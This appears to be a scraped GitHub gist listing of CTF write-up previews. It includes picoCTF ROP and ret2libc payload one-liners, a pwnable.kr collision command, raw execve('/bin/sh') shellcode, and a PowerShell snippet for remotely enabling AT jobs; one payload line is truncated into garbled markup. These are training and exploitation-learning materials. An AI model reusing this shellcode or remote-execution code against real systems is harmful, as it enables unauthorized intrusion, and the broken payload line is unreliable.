#! /usr/bin/python
import sys
import struct
if sys.byteorder == 'little':
Q = lambda x: struct.pack("<I", x)
elif sys.byteorder == 'big':
Q = lambda x: struct.pack(">I", x)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This code could be used to remotely enable and launch AT jobs regardless of the fact that AT is deprecated in Win8+. | |
| $HKLM = [UInt32] 2147483650 | |
| # Check to see if EnableAt is set | |
| $Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{ | |
| hDefKey = $HKLM | |
| sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration' | |
| sValueName = 'EnableAt' | |
| } |
spnow
/ README.md
Created
December 22, 2016 12:47
— forked from plvhx/README.md
picoCTF 2013 rop-4 re-writeup
spnow
/ README.md
Created
December 22, 2016 12:48
— forked from plvhx/README.md
picoCTF 2013 rop-3 re-writeup
very trivial though.. :v
(1) junk buffer is 0x80 + 12
(2) find address of libc_system in gdb
(3) find address of libc_exit in gdb
(4) find '/bin/sh' string in gdb (find &system,+9999999,"/bin/sh")
(5) pwned!
spnow
/ README.md
Created
December 22, 2016 12:48
— forked from plvhx/README.md
picoCTF 2013 rop-2 re-writeup
as same as rop-1. but, there is no function which call system('/bin/sh') like 'not_called' subroutine in rop-1. fortunately, there is a global variable called 'not_used' which value is '/bin/sh'. so, in this case we can use 'ret2libc' method to pwn that contrived binary. payload construction below:
["\x41"*(0x80 + 12) (in order to reach vulnerable_function return address)] + [libc_system addr] + [libc_exit addr (this is a fake libc_system return address)] + [address of 'not_used' global variable]
and then.. pwned!!
(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<i struct.pack="" cat="" .=""></i>
spnow
/ README.md
Created
December 22, 2016 12:48
— forked from plvhx/README.md
picoCTF 2013 rop-1 re-writeup
to overwrite the 'vulnerable_function' return address, we need 0x80 + 12 junk of buffer plus address of 'not_called'. So, the payload skeleton is: ["\x41"*(0x80 + 12)] + [address of 'not_called' subroutine]
(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", 0x080484a4))'; cat -) | ./rop1-fa6168f4d8eba0eb
spnow
/ README.md
Created
December 22, 2016 12:48
— forked from plvhx/README.md
pwnable.kr collision writeup
col@ubuntu:~$ ./col "$(python -c 'import struct;print "\xff"*(1 << 4) + struct.pack("<I", (0x21DD09EC + 4))')"
daddy! I just managed to create a hash collision :)
spnow
/ README.md
Created
December 22, 2016 12:52
— forked from plvhx/README.md
list of hand-made shellcode i've ever used in CTF...
[execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL)]
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" + \
"\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"
[execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL)]
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" + \
"\x50\x53\x89\xe1\x8d\x54\x24\x08\xb0\x0b\xcd\x80"
spnow
/ McAfeePrivesc.md
Created
January 3, 2017 11:49
— forked from toufik-airane/McAfeePrivesc.md
Thanks to @funoverip for his password decryption tool.
Thus to increase my reverse skills I'm back.
spnow
/ Returnmprotect.md
Created
January 3, 2017 11:58
— forked from toufik-airane/Returnmprotect.md
Ret2mprotect is an elegant way to bypass mitigation like NX/DEP by using mprotect() to set memory protection.
I assume that you are confortable with x86 stack-based overflow, ASM and shellcode.
spnow
/ DefeatRunPE.md
Created
January 3, 2017 13:55
— forked from toufik-airane/DefeatRunPE.md
Requirement :
- Ollydbg
- OllyDumpEx Plugin
- Un cerveau avec des connaissances sur RunPE